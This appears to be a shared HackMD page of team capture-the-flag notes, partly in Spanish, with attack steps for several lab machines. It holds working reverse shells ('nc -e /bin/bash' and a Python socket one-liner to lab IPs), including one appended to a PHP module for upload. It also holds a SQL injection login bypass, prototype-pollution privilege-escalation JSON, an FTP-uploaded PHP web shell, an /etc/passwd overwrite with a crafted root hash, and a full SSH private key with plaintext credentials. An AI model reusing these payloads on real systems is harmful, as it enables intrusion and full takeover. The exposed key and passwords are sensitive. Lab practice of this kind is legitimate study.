AAAAB3NzaC1yc2EAAAADAQABAAABgQDYPGRp2MbV2XfwiGUHtUxhJlSU5OkkUEmoqjgFAFHXiev0XEE9bBVSmtHyBaOH+TJXfhW9zAwN8seWtd0OZIMgJBzxL+UlPxRNYnNavDOkGyYotdbgTdmAaGSio8X0wF4GuWFeZUxjKIaUA/y2OBcGVGXi024RxhzP9mukVf1uaI7Jv50v62UL/eaxdIXh+YTHGajtOSrFu5Xvnz2c1PFutTmllEGjl0/eF7qoZUgMFMd4vkhUHoVms4yy7LtNYWDmuB46FVr3DmIVnDQi3LzMOwQa+cQPBunYeYRhtME8Aiu1o0njkCHB6feSKc2gopnGnhye737F1aDX2wIwmLWAaqH4CayxkuBMm+h3cljEHd0DdIVahEtJJNg+nVvdl1qvhzD6zFs7IqYsAZv7af80YRGqqP6LN151U3Y1HKKnBZPCKc2O54kBbs4xH/j2VOUq9hfzth6BzbFrN7qub6K2US/cQMMPH3Xvq8Zpge+mrjpjgKLtUK7Td3B5oWbgiRc= kali@kali YAML ``` ```bash= sudo /opt/node/bin/yml2json /tmp/poc.yml ``` AND WE ARE INSIDE (Login as root with id_rsa) ### oopsbucket ### wiredo Admin URL: http://TARGET/processwire ```Credentials admin:XXadmin1234XX ``` Descargar modulo: https://github.com/frameless-at/StripePlMailchimpSync/archive/main.zip ```bash= unzip StripePlMailchimpSync-main.zip nano StripePlMailchimpSync.module.php ``` Go to the very end of the module and modify as this: ```php= protected function splitFullNameSmart(string $full): array { $full = trim(preg_replace('~\s+~u', ' ', $full)); if($full === '') return ['first' => '', 'last' => '']; $parts = preg_split('~\s+~u', $full) ?: []; if(count($parts) === 1) return ['first' => $parts[0], 'last' => '']; $last = array_pop($parts); return ['first' => implode(' ', $parts), 'last' => $last]; } } system("nc -e /bin/bash 10.10.3.46 1234"); ``` Then follow this steps: https://cupc4k3.medium.com/cve-2023-24676-the-power-of-remote-file-inclusion-in-proccesswire-cms-a8fa5ace3255 But instead of modify the HTTP request go to: Modules > New and scroll down then go to the "Add Module from Upload", upload the .zip and start your listener. For privesc create this file: ```bash cat > /tmp/evil.json <<'EOF' {"constructor":{"prototype":{"authorized":true,"username":"root","command":"chmod +s /bin/bash"}}} EOF ``` ```bash sudo /usr/local/bin/zaj /tmp/evil.json ``` #### Chatgpt ```bash= # create payload cat > /tmp/payload.sh <<'EOF' #!/bin/sh # create a suid-root copy of /bin/bash (common CTF escalation) cp /bin/bash /tmp/rootbash chown root:root /tmp/rootbash chmod 4755 /tmp/rootbash # optional: touch a flag so we know it ran echo "pwned by zaj exploit" > /tmp/zaj_pwned EOF chmod +x /tmp/payload.sh ls -l /tmp/payload.sh ``` ```bash= cat > /tmp/evil.json <<'EOF' {"constructor":{"prototype":{"authorized":true,"username":"root","command":"/tmp/payload.sh"}}} EOF # inspect cat /tmp/evil.json sudo /usr/local/bin/zaj /tmp/evil.json ``` ## SrRequiem Notas ### judgedread Login SQLi `username=tunas@email.com&password=' OR 1=1-- -` admin pass: random-password USAR PYTHON SHELL PA TODO DE PREF https://github.com/Axiba55/cve_report/blob/main/judging-management-system/RCE-1.md Priv: ``` #priv.sh python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.2.82",4321));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' ``` ``` sudo /usr/local/bin/mutator '{"__proto__":{"CVE":["CVE-0001-0001",""],"poc":["","bash /tmp/priv.sh"]}}' ``` ### blobbuster ref: https://github.com/charmbracelet/vhs para privesc crear poc.tape ```bash= # Where should we write the GIF? Output demo.gif # Set up a 1200x600 terminal with 46px font. Set FontSize 46 Set Width 1200 Set Height 600 # Type a command in the terminal. Type "echo 'Welcome to VHS!';nc -e /bin/bash 10.10.2.30 5555;" # Pause for dramatic effect... Sleep 1000ms # Run the command by pressing enter. Enter # Admire the output for a bit. Sleep 5s ``` mandar por ssh ssh 10.0.6.3 -p 1976 < poc.tape > demo.gif tener listener para ejcuart un comando rapido ingresar la llave ssh publica al authorized_key ssh ETSCTF@.... para priv esc hjay sudo -l ```bash= cat > /tmp/malicious.sh <<'EOF' #!/bin/sh echo "pwned by root" > /tmp/root_file chmod 600 /tmp/root_file EOF chmod +x /tmp/malicious.sh echo 'ENV=/tmp/malicious.sh' > /tmp/.env echo 'BASH_ENV=/tmp/malicious.sh' > /tmp/.env sudo /usr/local/bin/dotenvecho bash -p ``` ### syncropwn admin:admin1234 https://github.com/kimai/kimai/security/advisories/GHSA-fjhg-96cp-6fcw Copiar contenido de `/etc/passwd` a priv.json: ```json {"__proto__":{"admin":true,"file":"/etc/passwd","contents":"root:$1$O4uAOCjg$LMyJyf5DqRgDRDNpI7oLV1:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\n..."}} ``` ``` sudo /usr/local/bin/ali ./priv.json su - Password: srrequiem ``` ### scamcart web.inc.php login ftp anonymous:anonymous put web.inc.php <?php system('nc -e /bin/bash 10.10.2.30 5555'); ?> path traversahl RCE http://10.0.2.2/admin.php?_g=../../../../../../../..//srv/ftp&node=web https://sploitus.com/exploit?id=1B6729B3-33C5-558E-93A3-E8D28D1C4E67 priv esc hay un cron copiando a las authorized?keys de root en /tmp/key.pub poner nuestra publica y hacer el patch https://github.com/advisories/GHSA-xg8v-m2mh-45m6 curl -v -X PATCH "http://127.0.0.1:3000/files/7ea5108cd722++940aea8d-c79b-490a-8796-a6e6dacbbe46" -H "Tus-Resumable: 1.0.0" -H "Upload-Offset: 0" -H "Content-Type: application/offset+octet-stream" --data-binary @/tmp/key.pub con pspy validar cuando se ejecute el cron y hacer ssh root@ip pwned ### sheetshow ``` # con python2 pip install alluxio import alluxio client = alluxio.Client('server', 39999) client.mount('/fs','/root') with client.open('/fs/.ssh/id_rsa', 'r') as f: print f.read() ``` ``` ssh root@server -i id_rsa ``` ## Th3d00msl4y3r Notas ### llmisery ### escapist ### scrumurai crear otro usuario admin y dentro de ese cargar un attachement en proyuectos- subir directo el .php /upload/attachements/file.php con rclone: Version "v1.68.1" privescp primero subir a ETSCTF sacando el id_rsa pra root copiar un passwd modificado y con "su" subir a root y pass personalizada ejemplo passwd la pass es -> kd3n4 root:$1$kd3n4$5P7sUTeqttfdak/c/wnzx/:0:0:root:/root:/bin/bash mkdir -p /tmp/home mkdir -p /tmp/home_new ln -s /home/ETSCTF/.ssh/id_rsa /tmp/home/id_rsa sudo -u ETSCTF /usr/bin/rclone copy /tmp/home /tmp/home_new --links --metadata --log-level=DEBUG -----BEGIN OPENSSH PRIVATE KEY----- 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 L9St+mILqQftTadQAAAAAB -----END OPENSSH PRIVATE KEY----- wget 10.10.2.30:8000/passwd sudo /usr/bin/rclone copy /tmp/passwd /etc/ --ignore-times --log-level=DEBUG ...

    Import from clipboard

    Paste your markdown or webpage here...

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lose their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template has been removed or transferred.
    Upgrade
    All
    • All
    • Team
    No template.

    Create a template

    Upgrade

    Delete template

    Do you really want to delete this template?
    Turn this template into a regular note and keep its content, versions, and comments.

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password

    or

    By clicking below, you agree to our terms of service.

    Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in with Wallet
    Wallet ( )
    Connect another wallet

    New to HackMD? Sign up

    Help

    • English
    • 中文
    • Français
    • Deutsch
    • 日本語
    • Español
    • Català
    • Ελληνικά
    • Português
    • italiano
    • Türkçe
    • Русский
    • Nederlands
    • hrvatski jezik
    • język polski
    • Українська
    • हिन्दी
    • svenska
    • Esperanto
    • dansk

    Documents

    Help & Tutorial

    How to use Book mode

    Slide Example

    API Docs

    Edit in VSCode

    Install browser extension

    Contacts

    Feedback

    Discord

    Send us email

    Resources

    Releases

    Pricing

    Blog

    Policy

    Terms

    Privacy

    Cheatsheet

    Syntax Example Reference
    # Header Header 基本排版
    - Unordered List
    • Unordered List
    1. Ordered List
    1. Ordered List
    - [ ] Todo List
    • Todo List
    > Blockquote
    Blockquote
    **Bold font** Bold font
    *Italics font* Italics font
    ~~Strikethrough~~ Strikethrough
    19^th^ 19th
    H~2~O H2O
    ++Inserted text++ Inserted text
    ==Marked text== Marked text
    [link text](https:// "title") Link
    ![image alt](https:// "title") Image
    `Code` Code 在筆記中貼入程式碼
    ```javascript
    var i = 0;
    ```    		 
    var i = 0;
    :smile: :smile: Emoji list
    {%youtube youtube_id %} Externals
    $L^aT_eX$ LaTeX
    :::info
    This is a alert area.
    :::

    This is a alert area.
    Versions and GitHub Sync
    Get Full History Access

    • Edit version name
    • Delete

    revision author avatar     named on  

    More Less

    Note content is identical to the latest version.
    Compare
      Choose a version
      No search result
      Version not found
    Sign in to link this note to GitHub
    Learn more
    This note is not linked with GitHub
     

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub
        • Please sign in to GitHub and install the HackMD app on your GitHub repo.
        • HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.
        Learn more  Sign in to GitHub

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions
        Include title and tags
        Available push count

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch
        Available push count

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully